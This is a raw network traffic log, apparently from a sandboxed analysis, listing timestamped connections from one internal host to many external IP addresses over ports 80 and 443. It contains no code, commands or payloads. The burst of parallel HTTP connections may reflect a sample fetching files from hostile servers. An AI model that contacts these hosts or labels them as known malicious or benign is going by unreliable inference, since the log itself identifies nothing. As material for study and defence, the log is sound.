Jul 2, 2024 00:04:59.049897909 CEST	49711	443	192.168.2.6	104.26.9.59
Jul 2, 2024 00:04:59.049915075 CEST	443	49711	104.26.9.59	192.168.2.6
Jul 2, 2024 00:04:59.070025921 CEST	49710	80	192.168.2.6	5.42.99.177
Jul 2, 2024 00:04:59.545593023 CEST	443	49711	104.26.9.59	192.168.2.6
Jul 2, 2024 00:04:59.545698881 CEST	49711	443	192.168.2.6	104.26.9.59
Jul 2, 2024 00:04:59.549323082 CEST	49711	443	192.168.2.6	104.26.9.59
Jul 2, 2024 00:04:59.549331903 CEST	443	49711	104.26.9.59	192.168.2.6
Jul 2, 2024 00:04:59.549576998 CEST	443	49711	104.26.9.59	192.168.2.6
Jul 2, 2024 00:04:59.601247072 CEST	49711	443	192.168.2.6	104.26.9.59
Jul 2, 2024 00:04:59.621314049 CEST	49711	443	192.168.2.6	104.26.9.59
Jul 2, 2024 00:04:59.664503098 CEST	443	49711	104.26.9.59	192.168.2.6
Jul 2, 2024 00:04:59.999810934 CEST	443	49711	104.26.9.59	192.168.2.6
Jul 2, 2024 00:04:59.999919891 CEST	443	49711	104.26.9.59	192.168.2.6
Jul 2, 2024 00:04:59.999978065 CEST	49711	443	192.168.2.6	104.26.9.59
Jul 2, 2024 00:05:00.000503063 CEST	49711	443	192.168.2.6	104.26.9.59
Jul 2, 2024 00:05:00.000520945 CEST	443	49711	104.26.9.59	192.168.2.6
Jul 2, 2024 00:05:00.000533104 CEST	49711	443	192.168.2.6	104.26.9.59
Jul 2, 2024 00:05:00.000539064 CEST	443	49711	104.26.9.59	192.168.2.6
Jul 2, 2024 00:05:00.010286093 CEST	49712	443	192.168.2.6	34.117.186.192
Jul 2, 2024 00:05:00.010348082 CEST	443	49712	34.117.186.192	192.168.2.6
Jul 2, 2024 00:05:00.010411024 CEST	49712	443	192.168.2.6	34.117.186.192
Jul 2, 2024 00:05:00.010870934 CEST	49712	443	192.168.2.6	34.117.186.192
Jul 2, 2024 00:05:00.010885000 CEST	443	49712	34.117.186.192	192.168.2.6
Jul 2, 2024 00:05:00.485167027 CEST	443	49712	34.117.186.192	192.168.2.6
Jul 2, 2024 00:05:00.485236883 CEST	49712	443	192.168.2.6	34.117.186.192
Jul 2, 2024 00:05:00.488518000 CEST	49712	443	192.168.2.6	34.117.186.192
Jul 2, 2024 00:05:00.488534927 CEST	443	49712	34.117.186.192	192.168.2.6
Jul 2, 2024 00:05:00.488787889 CEST	443	49712	34.117.186.192	192.168.2.6
Jul 2, 2024 00:05:00.490494013 CEST	49712	443	192.168.2.6	34.117.186.192
Jul 2, 2024 00:05:00.536505938 CEST	443	49712	34.117.186.192	192.168.2.6
Jul 2, 2024 00:05:00.641053915 CEST	443	49712	34.117.186.192	192.168.2.6
Jul 2, 2024 00:05:00.641184092 CEST	443	49712	34.117.186.192	192.168.2.6
Jul 2, 2024 00:05:00.641237020 CEST	49712	443	192.168.2.6	34.117.186.192
Jul 2, 2024 00:05:00.641341925 CEST	49712	443	192.168.2.6	34.117.186.192
Jul 2, 2024 00:05:00.641355991 CEST	443	49712	34.117.186.192	192.168.2.6
Jul 2, 2024 00:05:00.641379118 CEST	49712	443	192.168.2.6	34.117.186.192
Jul 2, 2024 00:05:00.641385078 CEST	443	49712	34.117.186.192	192.168.2.6
Jul 2, 2024 00:05:03.015115976 CEST	49710	80	192.168.2.6	5.42.99.177
Jul 2, 2024 00:05:03.015158892 CEST	49710	80	192.168.2.6	5.42.99.177
Jul 2, 2024 00:05:03.021179914 CEST	80	49710	5.42.99.177	192.168.2.6
Jul 2, 2024 00:05:03.021764040 CEST	80	49710	5.42.99.177	192.168.2.6
Jul 2, 2024 00:05:03.648180962 CEST	49674	443	192.168.2.6	173.222.162.64
Jul 2, 2024 00:05:03.648180962 CEST	49673	443	192.168.2.6	173.222.162.64
Jul 2, 2024 00:05:03.929461956 CEST	49672	443	192.168.2.6	173.222.162.64
Jul 2, 2024 00:05:05.111407995 CEST	80	49710	5.42.99.177	192.168.2.6
Jul 2, 2024 00:05:05.111426115 CEST	80	49710	5.42.99.177	192.168.2.6
Jul 2, 2024 00:05:05.111438036 CEST	80	49710	5.42.99.177	192.168.2.6
Jul 2, 2024 00:05:05.111526012 CEST	49710	80	192.168.2.6	5.42.99.177
Jul 2, 2024 00:05:05.689286947 CEST	443	49705	173.222.162.64	192.168.2.6
Jul 2, 2024 00:05:05.689383984 CEST	49705	443	192.168.2.6	173.222.162.64
Jul 2, 2024 00:05:05.740995884 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:05.742635965 CEST	49715	80	192.168.2.6	80.78.242.100
Jul 2, 2024 00:05:05.742981911 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:05.743577003 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:05.745843887 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:05.745908976 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:05.746052027 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:05.747847080 CEST	80	49715	80.78.242.100	192.168.2.6
Jul 2, 2024 00:05:05.747857094 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:05.747894049 CEST	49715	80	192.168.2.6	80.78.242.100
Jul 2, 2024 00:05:05.747915030 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:05.748087883 CEST	49718	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:05.748178959 CEST	49715	80	192.168.2.6	80.78.242.100
Jul 2, 2024 00:05:05.748383045 CEST	49719	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:05.748397112 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:05.748452902 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:05.748539925 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:05.748636961 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:05.749006033 CEST	49720	80	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:05.751065016 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:05.752873898 CEST	80	49718	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:05.752921104 CEST	49718	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:05.753168106 CEST	80	49715	80.78.242.100	192.168.2.6
Jul 2, 2024 00:05:05.753266096 CEST	80	49719	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:05.753335953 CEST	49719	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:05.753504992 CEST	49718	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:05.753536940 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:05.753586054 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:05.753659010 CEST	49719	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:05.753864050 CEST	80	49720	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:05.753912926 CEST	49720	80	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:05.754060030 CEST	49720	80	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:05.758347988 CEST	80	49718	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:05.758647919 CEST	80	49719	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:05.758898973 CEST	80	49720	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:05.780534983 CEST	49721	80	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:05.785535097 CEST	80	49721	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:05.785590887 CEST	49721	80	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:05.785846949 CEST	49721	80	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:05.791549921 CEST	80	49721	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:05.890963078 CEST	49722	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:05.895853043 CEST	80	49722	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:05.895930052 CEST	49722	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:05.896136999 CEST	49722	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:05.900949001 CEST	80	49722	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:06.235733986 CEST	80	49720	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:06.235790968 CEST	80	49720	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:06.235795975 CEST	49720	80	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:06.235905886 CEST	49720	80	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:06.236213923 CEST	49720	80	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:06.236666918 CEST	49723	80	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:06.241009951 CEST	80	49720	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:06.241446972 CEST	80	49723	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:06.241517067 CEST	49723	80	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:06.241756916 CEST	49723	80	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:06.246581078 CEST	80	49723	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:06.251404047 CEST	80	49721	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:06.251458883 CEST	49721	80	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:06.251629114 CEST	49721	80	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:06.251915932 CEST	49724	80	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:06.252664089 CEST	80	49721	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:06.252723932 CEST	49721	80	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:06.256761074 CEST	80	49721	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:06.256781101 CEST	80	49724	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:06.256863117 CEST	49724	80	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:06.257030964 CEST	49724	80	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:06.261765003 CEST	80	49724	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:06.447371006 CEST	80	49719	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:06.447452068 CEST	49719	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:06.447572947 CEST	80	49718	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:06.447653055 CEST	80	49719	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:06.447721958 CEST	49718	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:06.447840929 CEST	49719	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:06.447840929 CEST	49719	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:06.447942972 CEST	49718	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:06.448055029 CEST	80	49718	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:06.448101044 CEST	49718	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:06.448318958 CEST	49725	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:06.448318958 CEST	49726	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:06.450875044 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.450928926 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.451621056 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.452228069 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.452277899 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.452507973 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.452919960 CEST	80	49719	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:06.452945948 CEST	80	49718	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:06.453198910 CEST	80	49725	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:06.453257084 CEST	49725	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:06.453429937 CEST	49725	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:06.453876972 CEST	80	49726	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:06.453929901 CEST	49726	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:06.454042912 CEST	49726	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:06.456398010 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.457561016 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.458280087 CEST	80	49725	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:06.459043980 CEST	80	49726	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:06.472654104 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.472716093 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.473004103 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.477732897 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.482507944 CEST	80	49715	80.78.242.100	192.168.2.6
Jul 2, 2024 00:05:06.482561111 CEST	49715	80	192.168.2.6	80.78.242.100
Jul 2, 2024 00:05:06.492959023 CEST	49727	443	192.168.2.6	162.159.133.233
Jul 2, 2024 00:05:06.492988110 CEST	443	49727	162.159.133.233	192.168.2.6
Jul 2, 2024 00:05:06.493087053 CEST	49727	443	192.168.2.6	162.159.133.233
Jul 2, 2024 00:05:06.493299961 CEST	49727	443	192.168.2.6	162.159.133.233
Jul 2, 2024 00:05:06.493314028 CEST	443	49727	162.159.133.233	192.168.2.6
Jul 2, 2024 00:05:06.599900961 CEST	80	49722	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:06.599966049 CEST	49722	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:06.600235939 CEST	80	49722	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:06.600258112 CEST	49722	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:06.600281954 CEST	49722	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:06.600620031 CEST	49728	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:06.605201960 CEST	80	49722	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:06.605421066 CEST	80	49728	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:06.605496883 CEST	49728	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:06.605696917 CEST	49728	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:06.610654116 CEST	80	49728	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:06.667402983 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.667457104 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.667468071 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.667470932 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.667489052 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.667496920 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.667498112 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.667516947 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.667557001 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.668207884 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.668255091 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.668266058 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.668317080 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.668338060 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.668349028 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.668390989 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.689192057 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.689239025 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.689249992 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.689260960 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.689290047 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.689361095 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.689373970 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.689384937 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.689395905 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.689404011 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.689408064 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.689450026 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.689467907 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.689614058 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.689625978 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.689662933 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.689687014 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.690002918 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.690074921 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.694130898 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.694176912 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.694179058 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.694232941 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.712171078 CEST	80	49724	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:06.712227106 CEST	49724	80	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:06.712500095 CEST	49724	80	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:06.712673903 CEST	80	49724	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:06.712832928 CEST	49729	80	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:06.712833881 CEST	49724	80	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:06.717772961 CEST	80	49724	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:06.717786074 CEST	80	49729	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:06.717863083 CEST	49729	80	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:06.717974901 CEST	49729	80	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:06.718595982 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:06.718630075 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:06.718691111 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:06.718888998 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:06.718899012 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:06.723195076 CEST	80	49729	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:06.723248959 CEST	49729	80	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:06.730102062 CEST	80	49723	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:06.730113029 CEST	80	49723	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:06.730160952 CEST	49723	80	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:06.730336905 CEST	49723	80	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:06.730617046 CEST	49731	80	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:06.735341072 CEST	80	49723	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:06.741264105 CEST	80	49731	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:06.741318941 CEST	49731	80	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:06.741401911 CEST	49731	80	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:06.741961956 CEST	49732	443	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:06.741997957 CEST	443	49732	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:06.742132902 CEST	49732	443	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:06.742306948 CEST	49732	443	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:06.742326021 CEST	443	49732	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:06.747883081 CEST	80	49731	104.192.141.1	192.168.2.6
Jul 2, 2024 00:05:06.747941017 CEST	49731	80	192.168.2.6	104.192.141.1
Jul 2, 2024 00:05:06.771161079 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.771174908 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.771186113 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.771218061 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.771229029 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.771238089 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.771274090 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.771537066 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.771553993 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.771564960 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.771611929 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.771611929 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.771624088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.771658897 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.789550066 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.789657116 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.789664030 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.789666891 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.789679050 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.789690018 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.789700031 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.789709091 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.789711952 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.789748907 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.789763927 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.790802956 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.790855885 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.790973902 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.790986061 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.791017056 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.791028023 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.804857969 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.804873943 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.804933071 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.804932117 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.804946899 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.804987907 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.804987907 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.805026054 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.805038929 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.805049896 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.805090904 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.805114031 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.805135012 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.805164099 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.806221008 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.806279898 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.807013035 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.807070017 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.807564974 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.807609081 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.808152914 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.808165073 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.808212996 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.808307886 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.808347940 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.809165001 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.809211969 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.810941935 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.811003923 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.811016083 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.811027050 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.811043024 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.811058998 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.811058998 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.811070919 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.811081886 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.811093092 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.811094046 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.811105013 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.811108112 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.811150074 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.811150074 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.812374115 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.812540054 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.812716007 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.812733889 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:06.812769890 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.812778950 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:06.882169008 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.882189989 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.882200956 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.882220984 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.882257938 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.882345915 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.882358074 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.882395029 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.882544994 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.882555962 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.882601023 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:06.882688046 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:06.882699013 CEST	80	49716	77.105.133.27	192.168.2.6
